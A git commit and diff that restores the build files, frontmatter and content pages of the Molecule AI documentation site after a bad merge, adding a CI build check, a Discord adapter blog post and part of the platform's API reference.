fix: restore build infrastructure deleted by bad PR #59 merge

[Molecule-Platform-Evolvement-Manager] PR #59 (commit dae42e2) was merged ~2 weeks ago with a bad diff that deleted all Next.js/Fumadocs build files (package.json, app/, lib/, source.config.ts, tsconfig.json, etc.) and most MDX content pages. This broke the Vercel build, taking doc.moleculesai.app offline. Root cause: the PR branch was likely rebased or reset to a state that only contained the marketing/ subtree, so the merge diff showed deletions for every other file. This commit: 1. Restores all build infrastructure from the last good commit (86fa0e9) 2. Restores 25 deleted MDX content pages (concepts, quickstart, etc.) 3. Adds frontmatter (title) to 55 .md files added post-bad-merge that were missing the required YAML frontmatter for Fumadocs 4. Removes duplicate quickstart.mdx (superseded by quickstart.md) 5. Adds CI workflow (.github/workflows/ci.yml) to catch build failures on PRs before merge — this would have prevented the outage Build verified: 99 static pages generated successfully. Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
2026-04-22 14:03:24 -07:00 · 2026-04-22 14:03:24 -07:00 · 40bd0cfdde
commit 40bd0cfdde
parent d8aaca8e7b
98 changed files with 11870 additions and 0 deletions
--- a/.github/workflows/ci.yml
+++ b/.github/workflows/ci.yml
@ -0,0 +1,17 @@
+name: CI
+on:
+  push:
+    branches: [main]
+  pull_request:
+    branches: [main]
+jobs:
+  build:
+    runs-on: ubuntu-latest
+    steps:
+      - uses: actions/checkout@v4
+      - uses: actions/setup-node@v4
+        with:
+          node-version: 20
+          cache: npm
+      - run: npm ci
+      - run: npm run build
--- a/.gitignore
+++ b/.gitignore
@ -0,0 +1,58 @@
+# dependencies
+/node_modules
+/.pnp
+.pnp.*
+.yarn/*
+!.yarn/patches
+!.yarn/plugins
+!.yarn/releases
+!.yarn/versions
+
+# testing
+/coverage
+
+# next.js
+/.next/
+/out/
+
+# fumadocs generated source
+/.source/
+
+# production
+/build
+
+# misc
+.DS_Store
+*.pem
+
+# debug
+npm-debug.log*
+yarn-debug.log*
+yarn-error.log*
+.pnpm-debug.log*
+
+# env files
+.env*.local
+.env
+
+# typescript
+*.tsbuildinfo
+next-env.d.ts
+
+# IDE
+.vscode/
+.idea/
+
+# Credentials — added by chore/credentials-gitignore batch
+.env.local
+.env.*.local
+.env.*
+!.env.example
+!.env.sample
+*.key
+*.crt
+*.p12
+*.pfx
+.secrets/
+.auth-token
+.auth_token
--- a/app/(home)/layout.tsx
+++ b/app/(home)/layout.tsx
@ -0,0 +1,7 @@
+import { HomeLayout } from 'fumadocs-ui/layouts/home';
+import type { ReactNode } from 'react';
+import { baseOptions } from '@/app/layout.config';
+
+export default function Layout({ children }: { children: ReactNode }) {
+  return <HomeLayout {...baseOptions}>{children}</HomeLayout>;
+}
--- a/app/(home)/page.tsx
+++ b/app/(home)/page.tsx
@ -0,0 +1,29 @@
+import Link from 'next/link';
+
+export default function HomePage() {
+  return (
+    <main className="flex flex-1 flex-col items-center justify-center px-6 py-24 text-center">
+      <h1 className="mb-4 text-5xl font-bold tracking-tight sm:text-6xl">
+        Molecule AI
+      </h1>
+      <p className="mb-8 max-w-2xl text-lg text-fd-muted-foreground">
+        Build and run multi-agent organisations. Templates, plugins, channels,
+        and the runtime that ties them together — documented end to end.
+      </p>
+      <div className="flex flex-wrap items-center justify-center gap-3">
+        <Link
+          href="/docs"
+          className="rounded-md bg-fd-primary px-5 py-2.5 text-sm font-medium text-fd-primary-foreground transition-colors hover:opacity-90"
+        >
+          Read the docs
+        </Link>
+        <Link
+          href="https://github.com/Molecule-AI/molecule-monorepo"
+          className="rounded-md border border-fd-border px-5 py-2.5 text-sm font-medium transition-colors hover:bg-fd-muted"
+        >
+          View on GitHub
+        </Link>
+      </div>
+    </main>
+  );
+}
--- a/app/api/search/route.ts
+++ b/app/api/search/route.ts
@ -0,0 +1,10 @@
+import { NextResponse } from 'next/server';
+
+// Minimal search endpoint — returns empty results. The fumadocs
+// createFromSource/createSearchAPI both crash on v15.8 with "a.map
+// is not a function" during static page collection. This stub keeps
+// the route alive so the site builds; swap back to the fumadocs
+// search API once the upstream fix lands.
+export function GET() {
+  return NextResponse.json([]);
+}
--- a/app/docs/[[...slug]]/page.tsx
+++ b/app/docs/[[...slug]]/page.tsx
@ -0,0 +1,48 @@
+import { source } from '@/lib/source';
+import {
+  DocsBody,
+  DocsDescription,
+  DocsPage,
+  DocsTitle,
+} from 'fumadocs-ui/page';
+import { notFound } from 'next/navigation';
+import { getMDXComponents } from '@/mdx-components';
+
+export const dynamic = 'force-static';
+
+export default async function Page(props: {
+  params: Promise<{ slug?: string[] }>;
+}) {
+  const params = await props.params;
+  const page = source.getPage(params.slug);
+  if (!page) notFound();
+
+  const MDXContent = page.data.body;
+
+  return (
+    <DocsPage toc={page.data.toc ?? []} full={page.data.full}>
+      <DocsTitle>{page.data.title}</DocsTitle>
+      <DocsDescription>{page.data.description}</DocsDescription>
+      <DocsBody>
+        <MDXContent components={getMDXComponents()} />
+      </DocsBody>
+    </DocsPage>
+  );
+}
+
+export function generateStaticParams() {
+  return source.generateParams();
+}
+
+export async function generateMetadata(props: {
+  params: Promise<{ slug?: string[] }>;
+}) {
+  const params = await props.params;
+  const page = source.getPage(params.slug);
+  if (!page) notFound();
+
+  return {
+    title: page.data.title,
+    description: page.data.description,
+  };
+}
--- a/app/docs/layout.tsx
+++ b/app/docs/layout.tsx
@ -0,0 +1,13 @@
+import { DocsLayout } from 'fumadocs-ui/layouts/docs';
+import type { ReactNode } from 'react';
+import { baseOptions } from '@/app/layout.config';
+import { source } from '@/lib/source';
+
+export default function Layout({ children }: { children: ReactNode }) {
+  const tree = source.pageTree;
+  return (
+    <DocsLayout tree={tree} {...baseOptions}>
+      {children}
+    </DocsLayout>
+  );
+}
--- a/app/global.css
+++ b/app/global.css
@ -0,0 +1,3 @@
+@import 'tailwindcss';
+@import 'fumadocs-ui/css/neutral.css';
+@import 'fumadocs-ui/css/preset.css';
--- a/app/layout.config.tsx
+++ b/app/layout.config.tsx
@ -0,0 +1,7 @@
+import type { BaseLayoutProps } from 'fumadocs-ui/layouts/shared';
+
+export const baseOptions: BaseLayoutProps = {
+  nav: {
+    title: 'Molecule AI',
+  },
+};
--- a/app/layout.tsx
+++ b/app/layout.tsx
@ -0,0 +1,28 @@
+import './global.css';
+import { RootProvider } from 'fumadocs-ui/provider/next';
+import { Inter } from 'next/font/google';
+import type { ReactNode } from 'react';
+
+const inter = Inter({
+  subsets: ['latin'],
+});
+
+export const metadata = {
+  title: {
+    default: 'Molecule AI Documentation',
+    template: '%s | Molecule AI Docs',
+  },
+  description:
+    'Build and run multi-agent organisations on the Molecule AI platform. Templates, plugins, channels, and the runtime that ties them together.',
+  metadataBase: new URL('https://doc.moleculesai.app'),
+};
+
+export default function Layout({ children }: { children: ReactNode }) {
+  return (
+    <html lang="en" className={inter.className} suppressHydrationWarning>
+      <body className="flex flex-col min-h-screen">
+        <RootProvider>{children}</RootProvider>
+      </body>
+    </html>
+  );
+}
--- a/content/blog/2026-04-21-discord-adapter/index.mdx
+++ b/content/blog/2026-04-21-discord-adapter/index.mdx
@ -0,0 +1,80 @@
+---
+title: "Your AI Agents, Live in Discord: Discord Adapter Ships on Molecule AI"
+description: "Molecule AI's Discord adapter connects AI agent workspaces to Discord servers via slash commands and webhooks — no polling, no bot token management, no separate setup required beyond a webhook URL."
+publishedAt: 2026-04-21
+tags: [channels, discord, integrations, platform]
+---
+
+The same question that comes up every time someone deploys an AI agent team: *can we talk to it from where our team already communicates?*
+
+For many teams, that place is Discord. Not as a notification sink — as a working interface. Teams run standups, triage issues, and coordinate deployments in Discord channels. The idea of switching to a web UI or a separate tool to interact with an agent feels like a step backward.
+
+Molecule AI's Discord adapter makes that unnecessary.
+
+## How the Discord Adapter Works
+
+The adapter connects an AI agent workspace to a Discord channel using two standard Discord features: **Incoming Webhooks** (for outbound messages) and **Discord Interactions** (for inbound slash commands).
+
+**Setup is minimal.** You provide a Discord Incoming Webhook URL — the one that Discord generates when you add a webhook to any channel. That's it. No bot creation in the Developer Portal, no OAuth flow, no Gateway setup. The webhook URL encodes the channel and bot credentials, so a single URL is all the adapter needs to send and receive.
+
+On the inbound side, Discord delivers slash command interactions as signed JSON POSTs to your Interactions endpoint. The adapter parses the interaction, reconstructs the slash command as text (`/ask what's our deployment status`), and passes it to the agent as a standard inbound message.
+
+On the outbound side, the agent's response is sent back to the same Discord channel via the webhook. Messages longer than 2000 characters are automatically split at word boundaries.
+
+## Slash Commands as the Interface
+
+Discord bots in guilds can only read messages they have specific permissions for. The Discord adapter sidesteps this entirely by using **slash commands** as the only inbound interface.
+
+Users invoke the agent by typing a slash command:
+
+```
+/ask what's our current deployment status?
+/ask any open incidents?
+/ask summarize the last 24 hours of test results
+```
+
+The command name and options are extracted from the Discord Interactions payload and reconstructed as plain text for the agent. The agent's response goes back to the same channel via the webhook.
+
+This means:
+- No message reading permissions required
+- No rate limit concerns from polling
+- Clean, deliberate interaction model — users invoke the agent explicitly
+
+## How It Fits Into the Agent Hierarchy
+
+A Discord channel connected to a workspace becomes part of the agent hierarchy like any other channel. The Community Manager agent can be the primary interface — it receives the slash command, routes it to the right sub-agent (Security Auditor, QA Engineer, PM), and returns the answer to Discord.
+
+```
+Discord server
+  ↓ slash command
+Community Manager (Molecule AI workspace)
+  ↓ delegate_task
+Security Auditor / QA Engineer / PM
+  ↓ response
+Discord channel ← answer
+```
+
+The routing is invisible to the Discord user. They see a single response from the Community Manager, with the sub-agent delegation happening entirely within the Molecule AI platform.
+
+## Connecting to Canvas
+
+The Discord adapter is managed from the **Channels** tab in Canvas, alongside Telegram and other social channels. From there you can:
+
+- Connect a Discord channel with a webhook URL
+- Set an allowlist of Discord user IDs or roles (optional — empty means allow everyone)
+- Send a test message to verify the connection
+- View channel status and message counts
+
+The adapter also works via API: `POST /workspaces/:id/channels` with `channel_type: "discord"` and the webhook URL in the config.
+
+## Security Notes
+
+Discord Interactions payloads are verified at the router layer before reaching the adapter — requests without a valid signature are rejected before any parsing occurs.
+
+Webhook URLs contain embedded credentials and are stored masked in the database. Error messages throughout the adapter intentionally do not wrap the full webhook URL to prevent credentials leaking into logs or error responses.
+
+## What's Next
+
+Discord is the third platform adapter, following Telegram. Slack and WhatsApp are next on the roadmap.
+
+If you're already running Molecule AI agents and want to connect a Discord server, the Channels tab in Canvas is where to start. The adapter is live now.
--- a/content/docs/adapters/hermes-adapter-design.md
+++ b/content/docs/adapters/hermes-adapter-design.md
@ -1,3 +1,6 @@
+---
+title: "Hermes Adapter — Shell Design Spec"
+---
 # Hermes Adapter — Shell Design Spec

 **Perspective:** DevOps Engineer + Backend Engineer  
--- a/content/docs/adapters/hermes-adapter-plan.md
+++ b/content/docs/adapters/hermes-adapter-plan.md
@ -1,3 +1,6 @@
+---
+title: "Hermes Adapter — Implementation Plan"
+---
 # Hermes Adapter — Implementation Plan

 **Author:** Dev Lead  
--- a/content/docs/adapters/hermes-recon.md
+++ b/content/docs/adapters/hermes-recon.md
@ -1,3 +1,6 @@
+---
+title: "Hermes Agent — Adapter Reconnaissance"
+---
 # Hermes Agent — Adapter Reconnaissance

 Reconnaissance of [NousResearch/hermes-agent](https://github.com/NousResearch/hermes-agent) (v0.8.0, 68,713 ⭐, MIT) for potential Molecule AI adapter integration.
--- a/content/docs/adapters/medo-integration.md
+++ b/content/docs/adapters/medo-integration.md
@ -1,3 +1,6 @@
+---
+title: "MeDo Integration Design — Molecule AI Hackathon (May 20 2026)"
+---
 # MeDo Integration Design — Molecule AI Hackathon (May 20 2026)

 **Status:** Design — implementation pending operator sign-off on open questions (§5).  
--- a/content/docs/adapters/medo-smoke-test-log.md
+++ b/content/docs/adapters/medo-smoke-test-log.md
@ -1,3 +1,6 @@
+---
+title: "MeDo Smoke Test Log — 2026-04-13 (Run 4)"
+---
 # MeDo Smoke Test Log — 2026-04-13 (Run 4)

 **Tester:** PM (direct execution)  
--- a/content/docs/adr/ADR-001-admin-token-scope.md
+++ b/content/docs/adr/ADR-001-admin-token-scope.md
@ -1,3 +1,6 @@
+---
+title: "ADR-001: Admin endpoints accept any workspace bearer token"
+---
 # ADR-001: Admin endpoints accept any workspace bearer token

 **Status:** Accepted — known risk, Phase-H remediation planned
--- a/content/docs/agent-runtime/agent-card.md
+++ b/content/docs/agent-runtime/agent-card.md
@ -1,3 +1,6 @@
+---
+title: "Agent Card"
+---
 # Agent Card

 Every workspace publishes an Agent Card at `/.well-known/agent-card.json`. This is a standard A2A document that describes the workspace's identity, capabilities, and how to communicate with it.
--- a/content/docs/agent-runtime/bundle-system.md
+++ b/content/docs/agent-runtime/bundle-system.md
@ -1,3 +1,6 @@
+---
+title: "Bundle System"
+---
 # Bundle System

 A workspace bundle is the portable unit of the platform. It is a single `.bundle.json` file that captures everything needed to recreate a workspace anywhere.
--- a/content/docs/agent-runtime/cli-runtime.md
+++ b/content/docs/agent-runtime/cli-runtime.md
@ -1,3 +1,6 @@
+---
+title: "Agent Runtime Adapters"
+---
 # Agent Runtime Adapters

 ## Overview
--- a/content/docs/agent-runtime/config-format.md
+++ b/content/docs/agent-runtime/config-format.md
@ -1,3 +1,6 @@
+---
+title: "Config Format (config.yaml)"
+---
 # Config Format (config.yaml)

 Each workspace type has a `config.yaml` that defines its personality — the model, skills, tools, and settings.
--- a/content/docs/agent-runtime/skills.md
+++ b/content/docs/agent-runtime/skills.md
@ -1,3 +1,6 @@
+---
+title: "Skills"
+---
 # Skills

 A skill is a package that gives an agent knowledge, instructions, and optionally executable tools. Skills are the primary way to customize what a workspace agent can do.
--- a/content/docs/agent-runtime/social-channels.md
+++ b/content/docs/agent-runtime/social-channels.md
@ -1,3 +1,6 @@
+---
+title: "Social Channels"
+---
 # Social Channels

 Connect AI agent workspaces to social platforms (Telegram, Slack, Discord) so users can talk to agents from anywhere. Built on a pluggable adapter pattern — one channel per workspace, multiple chats per channel.
--- a/content/docs/agent-runtime/system-prompt-structure.md
+++ b/content/docs/agent-runtime/system-prompt-structure.md
@ -1,3 +1,6 @@
+---
+title: "System Prompt Structure"
+---
 # System Prompt Structure

 When a workspace agent starts (or rebuilds its prompt), the system prompt is assembled in a specific order: **specific to general** — the agent's own identity first, then what it can do, then what it can delegate.
--- a/content/docs/agent-runtime/team-expansion.md
+++ b/content/docs/agent-runtime/team-expansion.md
@ -1,3 +1,6 @@
+---
+title: "Team Expansion (Recursive Workspaces)"
+---
 # Team Expansion (Recursive Workspaces)

 When a workspace is expanded into a team, it gains sub-workspaces while its own agent remains as the **team lead** (coordinator). This is recursive — sub-workspaces can themselves be expanded into teams, infinitely deep.
--- a/content/docs/api-protocol/a2a-protocol.md
+++ b/content/docs/api-protocol/a2a-protocol.md
@ -1,3 +1,6 @@
+---
+title: "A2A Protocol (Inter-Workspace Communication)"
+---
 # A2A Protocol (Inter-Workspace Communication)

 Workspaces talk to each other **directly** via A2A (Agent-to-Agent protocol) — the platform is not in the message path.
--- a/content/docs/api-protocol/communication-rules.md
+++ b/content/docs/api-protocol/communication-rules.md
@ -1,3 +1,6 @@
+---
+title: "Communication Rules"
+---
 # Communication Rules

 The hierarchy IS the topology. There is no manual connection wiring — communication is derived automatically from the parent/child structure.
--- a/content/docs/api-protocol/platform-api.md
+++ b/content/docs/api-protocol/platform-api.md
@ -1,3 +1,6 @@
+---
+title: "Platform API (Go Backend)"
+---
 # Platform API (Go Backend)

 The Go backend is Molecule AI's control plane. It does not execute agent reasoning itself. It manages the infrastructure and coordination around workspaces.
--- a/content/docs/api-protocol/registry-and-heartbeat.md
+++ b/content/docs/api-protocol/registry-and-heartbeat.md
@ -1,3 +1,6 @@
+---
+title: "Registry & Heartbeat"
+---
 # Registry & Heartbeat

 Every workspace registers with the platform on startup and sends a heartbeat every 30 seconds. This is how the platform knows which workspaces are alive and where to find them.
--- a/content/docs/api-protocol/websocket-events.md
+++ b/content/docs/api-protocol/websocket-events.md
@ -1,3 +1,6 @@
+---
+title: "WebSocket Events"
+---
 # WebSocket Events

 The canvas subscribes to the platform's WebSocket at `/ws` and receives real-time structure events as JSON messages.
--- a/content/docs/api-reference.mdx
+++ b/content/docs/api-reference.mdx
@ -0,0 +1,754 @@
+---
+title: API Reference
+description: Complete reference for all Molecule AI Platform HTTP and WebSocket endpoints.
+---
+
+# API Reference
+
+The Molecule AI Platform exposes a REST API (default port 8080) for workspace management, agent registry, communication, and administration. All endpoints return JSON unless otherwise noted.
+
+<Callout type="warn">
+  **Breaking changes — PR #701 (2026-04-17)**
+
+  - **`PATCH /workspaces/:id` now requires authentication.** Previously, requests without a bearer token could update cosmetic fields (name, x/y position). All `PATCH` calls now require `Authorization: Bearer <workspace-token>` or receive **401 Unauthorized**.
+  - **`GET /templates` and `GET /org/templates` now require AdminAuth.** Unauthenticated callers receive **401 Unauthorized**.
+  - **All `/workspaces/:id` endpoints validate the `:id` path parameter** as a UUID. Non-UUID values return **400 Bad Request** before any database interaction.
+
+  **Migration:** add `Authorization: Bearer <workspace-token>` to all `PATCH /workspaces/:id` calls. Use an admin bearer token for `GET /templates` and `GET /org/templates`. Ensure `:id` values in automation scripts are valid UUIDs.
+</Callout>
+
+**Base URL:** `http://localhost:8080` (self-hosted) or `https://api.moleculesai.app` (SaaS)
+
+---
+
+## Authentication Model
+
+The platform uses three authentication middleware variants depending on the sensitivity of the route.
+
+### AdminAuth
+
+Strict bearer-token authentication. Required for any route where a forged request could leak prompts/memory, create/mutate workspaces, or leak operational data.
+
+```
+Authorization: Bearer <token>
+```
+
+**Fail-open behavior:** When no live tokens exist globally (fresh install), AdminAuth passes all requests through. Once the first token is created, all AdminAuth routes require a valid bearer.
+
+### WorkspaceAuth
+
+Per-workspace bearer token binding. Workspace A's token cannot access workspace B's sub-routes. Used for the entire `/workspaces/:id/*` group (except the A2A proxy, which uses `CanCommunicate`).
+
+```
+Authorization: Bearer <workspace-token>
+```
+
+### CanvasOrBearer
+
+Accepts either a valid bearer token OR a request whose `Origin` header matches `CORS_ORIGINS`. Used only for cosmetic-only routes where a forged request has zero data/security impact.
+
+Currently applies only to `PUT /canvas/viewport`. Do not extend to data-sensitive routes.
+
+---
+
+## Health and Monitoring
+
+| Method | Path | Auth | Description |
+|--------|------|------|-------------|
+| GET | `/health` | None | Returns `200 OK` if the platform is running. Use for load balancer health checks. |
+| GET | `/metrics` | None | Prometheus text format (v0.0.4) metrics. Scrape-safe, no auth required. |
+| GET | `/admin/liveness` | AdminAuth | Per-subsystem `supervised.Snapshot()` ages. Check before debugging stuck scheduler/heartbeat goroutines. |
+
+---
+
+## Workspaces
+
+Core workspace CRUD and lifecycle operations.
+
+### CRUD
+
+| Method | Path | Auth | Description |
+|--------|------|------|-------------|
+| POST | `/workspaces` | AdminAuth | Create a new workspace. Accepts `name`, `runtime`, `template`, `parent_id`, `tier`, `workspace_dir`, and other fields. Runtime is auto-detected from template config if omitted (defaults to `langgraph`). |
+| GET | `/workspaces` | AdminAuth | List all workspaces with status, runtime, agent card, position, and hierarchy info. |
+| GET | `/workspaces/:id` | WorkspaceAuth | Get a single workspace by ID. |
+| PATCH | `/workspaces/:id` | WorkspaceAuth | Update workspace fields. A workspace bearer token is always required — unauthenticated calls return 401. Validates field constraints: `name` ≤ 255 chars, `role` ≤ 1,000 chars, `model` and `runtime` ≤ 100 chars each; `name` and `role` must not contain newlines (`\\n`, `\\r`) or YAML-special characters (`{}[]|>*&!`). Oversized or invalid field values return 400. `:id` must be a valid UUID. Financial fields (`budget_limit`) are not accepted here — use `PATCH /workspaces/:id/budget` (AdminAuth). |
+| DELETE | `/workspaces/:id` | AdminAuth | Delete a workspace. Stops the container, revokes all auth tokens, and removes all associated data. |
+
+### Lifecycle
+
+| Method | Path | Auth | Description |
+|--------|------|------|-------------|
+| POST | `/workspaces/:id/restart` | WorkspaceAuth | Restart the workspace container. Sends a `restart_context` A2A message after successful re-registration. |
+| POST | `/workspaces/:id/pause` | WorkspaceAuth | Stop the container and set status to `paused`. Paused workspaces skip health sweep, liveness monitor, and auto-restart. Resume manually via `/resume`. |
+| POST | `/workspaces/:id/resume` | WorkspaceAuth | Re-provision a paused workspace. Status transitions to `provisioning`. |
+| POST | `/workspaces/:id/hibernate` | WorkspaceAuth | Immediately hibernate a workspace (stop container, set status to `hibernated`). Useful for manual cost control. See hibernation note below. |
+
+<Callout type="info">
+  **Workspace hibernation**
+
+  A workspace with `hibernation_idle_minutes` set in its config will be **automatically hibernated** by the platform after that many idle minutes (no active tasks, no recent heartbeat). The monitor checks every 2 minutes.
+
+  `hibernated` differs from `paused`:
+  - **`paused`** — manual, resumes only via `POST /resume`.
+  - **`hibernated`** — automatic (or via `POST /hibernate`), resumes **automatically** when an A2A message arrives.
+
+  When a message is sent to a hibernated workspace, the platform returns:
+  ```
+  HTTP 503  Retry-After: 15
+  {"waking": true}
+  ```
+  Callers should retry after ~15 seconds. The workspace typically returns to `online` within that window.
+
+  To opt a workspace into auto-hibernation, add to its `config.yaml`:
+  ```yaml
+  hibernation_idle_minutes: 30   # hibernate after 30 min idle; null (default) = disabled
+  ```
+
+  **Atomic hibernation guarantee:** The platform uses a single atomic SQL claim (`UPDATE … WHERE active_tasks = 0`) before stopping the container. If a task arrives between the idle check and the container stop, the claim fails and hibernation is aborted — no in-flight tasks are silently lost.
+</Callout>
+
+### Budget
+
+| Method | Path | Auth | Description |
+|--------|------|------|-------------|
+| GET | `/workspaces/:id/budget` | AdminAuth | Read a workspace's current spend and ceiling. Returns `budget_limit`, `monthly_spend`, and `budget_remaining` (all in USD cents). |
+| PATCH | `/workspaces/:id/budget` | AdminAuth | Set or clear a workspace's monthly spend ceiling. Body: `{ "budget_limit": N }` (positive integer, USD cents) or `{ "budget_limit": null }` to remove the cap. Negative values → 400. Returns same shape as GET. |
+
+**Request / response shape:**
+
+```json
+// PATCH request body
+{ "budget_limit": 500 }   // $5.00/month ceiling
+{ "budget_limit": null }  // no ceiling
+
+// GET and PATCH success response (200)
+{
+  "budget_limit":     500,   // null when no ceiling
+  "monthly_spend":    312,   // accumulated spend this period, USD cents
+  "budget_remaining": 188    // null when no ceiling; max(0, limit-spend) — can be negative
+}
+```
+
+<Callout type="warn">
+  **`budget_limit` and `monthly_spend` are absent from `GET /workspaces/:id`**
+
+  Financial fields are stripped unconditionally from the workspace detail
+  response — they do not appear for any caller, authenticated or not. Always
+  use `GET /workspaces/:id/budget` (AdminAuth) to read spend data.
+
+  `budget_limit` is also **not** accepted on the general `PATCH /workspaces/:id`
+  endpoint. Use the dedicated `/budget` route.
+</Callout>
+
+<Callout type="info">
+  **Enforcement and fail-open behaviour**
+
+  When `monthly_spend >= budget_limit`, `POST /workspaces/:id/a2a` returns:
+  ```
+  HTTP 402 Payment Required
+  {"error": "workspace budget limit exceeded"}
+  ```
+  Channel sends (Slack, Telegram, Discord, Lark) are also budget-gated with
+  the same 402 response. The workspace itself is **not paused** — it keeps
+  running; only inbound A2A and channel traffic is blocked.
+
+  **Fail-open:** if the budget check encounters a DB error, traffic is allowed
+  through rather than blocked. The spend ceiling is a soft guardrail, not a
+  hard guarantee.
+</Callout>
+
+---
+
+## Registry
+
+Workspace registration and heartbeat endpoints. Called by workspace runtimes, not by end users.
+
+| Method | Path | Auth | Description |
+|--------|------|------|-------------|
+| POST | `/registry/register` | None | Register a workspace with the platform. Sets status to `online`. Body includes agent URL, agent card, capabilities. |
+| POST | `/registry/heartbeat` | Bearer (if token exists) | Send a heartbeat. Updates Redis TTL key (60s expiry). Body can include `active_tasks`, `current_task`, `error_rate`. Triggers `degraded` status if `error_rate > 0.5`. |
+| POST | `/registry/update-card` | Bearer (if token exists) | Update the workspace's agent card (name, description, skills, etc.). |
+
+---
+
+## Discovery
+
+Peer discovery and access control verification.
+
+| Method | Path | Auth | Description |
+|--------|------|------|-------------|
+| GET | `/registry/discover/:id` | Bearer + `X-Workspace-ID` | Discover a workspace's agent card and URL. Requires caller identification. Fails open on DB hiccup since hierarchy check is primary. |
+| GET | `/registry/:id/peers` | Bearer + `X-Workspace-ID` | List all peers (siblings, parent, children) that the caller can communicate with. |
+| POST | `/registry/check-access` | None | Check whether two workspaces can communicate. Body: `{ "caller_id": "...", "target_id": "..." }`. Returns `{ "allowed": true/false }`. |
+
+---
+
+## Communication
+
+### A2A Proxy
+
+| Method | Path | Auth | Description |
+|--------|------|------|-------------|
+| POST | `/workspaces/:id/a2a` | CanCommunicate | Proxy an A2A JSON-RPC message to the target workspace. Caller identified via `X-Workspace-ID` header. Canvas requests (no header) bypass access check. On connection error, checks if container is dead and triggers auto-restart. |
+
+### Delegation
+
+| Method | Path | Auth | Description |
+|--------|------|------|-------------|
+| POST | `/workspaces/:id/delegate` | WorkspaceAuth | Async fire-and-forget delegation. Supports idempotency keys. Body includes target workspace, prompt, and metadata. |
+| GET | `/workspaces/:id/delegations` | WorkspaceAuth | List delegation status for a workspace. Returns delegation rows with status, result, timestamps. |
+
+---
+
+## Configuration
+
+| Method | Path | Auth | Description |
+|--------|------|------|-------------|
+| GET | `/workspaces/:id/config` | WorkspaceAuth | Get the workspace's `config.yaml` contents. |
+| PATCH | `/workspaces/:id/config` | WorkspaceAuth | Update the workspace config. "Save & Restart" writes config and auto-restarts; "Save" writes only and shows a restart banner in the Canvas. |
+
+---
+
+## Secrets
+
+### Per-Workspace Secrets
+
+| Method | Path | Auth | Description |
+|--------|------|------|-------------|
+| GET | `/workspaces/:id/secrets` | WorkspaceAuth | List secret keys for a workspace (keys only, values masked). |
+| POST | `/workspaces/:id/secrets` | WorkspaceAuth | Set a secret `{ "key": "...", "value": "..." }`. Auto-restarts the workspace. |
+| PUT | `/workspaces/:id/secrets` | WorkspaceAuth | Alias for POST (upsert semantics). Auto-restarts the workspace. |
+| DELETE | `/workspaces/:id/secrets/:key` | WorkspaceAuth | Delete a secret by key. Auto-restarts the workspace. |
+| GET | `/workspaces/:id/model` | WorkspaceAuth | Return the model configuration derived from available API keys (which provider keys are set). |
+
+### Global Secrets
+
+| Method | Path | Auth | Description |
+|--------|------|------|-------------|
+| GET | `/settings/secrets` | AdminAuth | List global secrets (keys only, values masked). |
+| PUT | `/settings/secrets` | AdminAuth | Set a global secret `{ "key": "...", "value": "..." }`. Auto-restarts every non-paused/non-removed workspace that does not shadow the key with a workspace-level override. |
+| POST | `/settings/secrets` | AdminAuth | Alias for PUT. |
+| DELETE | `/settings/secrets/:key` | AdminAuth | Delete a global secret. Same auto-restart fan-out as PUT. |
+
+Legacy aliases `GET/POST/DELETE /admin/secrets[/:key]` also exist and behave identically.
+
+---
+
+## Memory
+
+### Key-Value Memory
+
+| Method | Path | Auth | Description |
+|--------|------|------|-------------|
+| GET | `/workspaces/:id/memory` | WorkspaceAuth | List all key-value memory entries for a workspace. |
+| POST | `/workspaces/:id/memory` | WorkspaceAuth | Set a memory entry `{ "key": "...", "value": "..." }`. |
+| DELETE | `/workspaces/:id/memory/:key` | WorkspaceAuth | Delete a memory entry by key. |
+
+### Agent Memories (HMA-scoped)
+
+| Method | Path | Auth | Description |
+|--------|------|------|-------------|
+| GET | `/workspaces/:id/memories` | WorkspaceAuth | List or search agent memories. Supports `?q=` for semantic search (see below). |
+| POST | `/workspaces/:id/memories` | WorkspaceAuth | Create an agent memory entry. |
+| DELETE | `/workspaces/:id/memories/:id` | WorkspaceAuth | Delete an agent memory by ID. |
+
+#### Semantic search (`?q=`)
+
+When a platform-level embedding function is configured, passing `?q=<text>`
+on `GET /workspaces/:id/memories` triggers vector similarity search instead of
+the default full-text / ILIKE path:
+
+```
+GET /workspaces/{id}/memories?q=authentication+flow&limit=10
+Authorization: Bearer {token}
+```
+
+Matching entries are returned **ordered by cosine similarity** (most similar
+first). Each row includes an additional `similarity_score` field (0–1, higher
+is closer):
+
+```json
+[
+  {
+    "id": "mem_abc123",
+    "key": "auth-design",
+    "value": "We use short-lived JWTs issued by the platform and refreshed via /auth/token.",
+    "similarity_score": 0.91,
+    "created_at": "2026-04-10T14:22:00Z"
+  }
+]
+```
+
+**Graceful fallback**: if no embedding function is configured, or if the
+embedding call fails for a given query, the platform falls back transparently
+to the text-search path. The `similarity_score` field is absent in fallback
+responses. You do not need to change client code to handle both modes.
+
+---
+
+## Files
+
+Workspace file management. Files are stored in the workspace's config directory.
+
+| Method | Path | Auth | Description |
+|--------|------|------|-------------|
+| GET | `/workspaces/:id/files` | WorkspaceAuth | List files in the workspace config directory. |
+| GET | `/workspaces/:id/files/*path` | WorkspaceAuth | Read a specific file. |
+| PUT | `/workspaces/:id/files/*path` | WorkspaceAuth | Write a file. Creates parent directories as needed. |
+| DELETE | `/workspaces/:id/files/*path` | WorkspaceAuth | Delete a file. |
+| GET | `/workspaces/:id/shared-context` | WorkspaceAuth | Get the shared context files for a workspace (aggregated from parent hierarchy). |
+
+---
+
+## Activity
+
+Activity logging and search for A2A communications, task updates, and agent logs.
+
+| Method | Path | Auth | Description |
+|--------|------|------|-------------|
+| GET | `/workspaces/:id/activity` | WorkspaceAuth | List activity logs for a workspace. Supports `?source=canvas` or `?source=agent` filter, and `?type=delegation` for A2A topology overlay polling. |
+| POST | `/workspaces/:id/activity` | WorkspaceAuth | Log an activity entry (used by workspace runtimes to self-report). |
+| POST | `/workspaces/:id/notify` | WorkspaceAuth | Agent-to-user push message via WebSocket. Delivers a notification to connected Canvas clients. |
+
+---
+
+## Audit Ledger
+
+Tamper-evident audit trail for workspace events. Used by the Canvas Audit Trail panel.
+
+| Method | Path | Auth | Description |
+|--------|------|------|-------------|
+| GET | `/workspaces/:id/audit` | WorkspaceAuth | List audit entries for a workspace. Supports `?event_type=delegation\|decision\|gate\|hitl`, `?cursor=<cursor>`, and `?limit=<n>` (default 50). |
+
+### Audit entry schema
+
+| Field | Type | Description |
+|-------|------|-------------|
+| `id` | string | Unique entry ID |
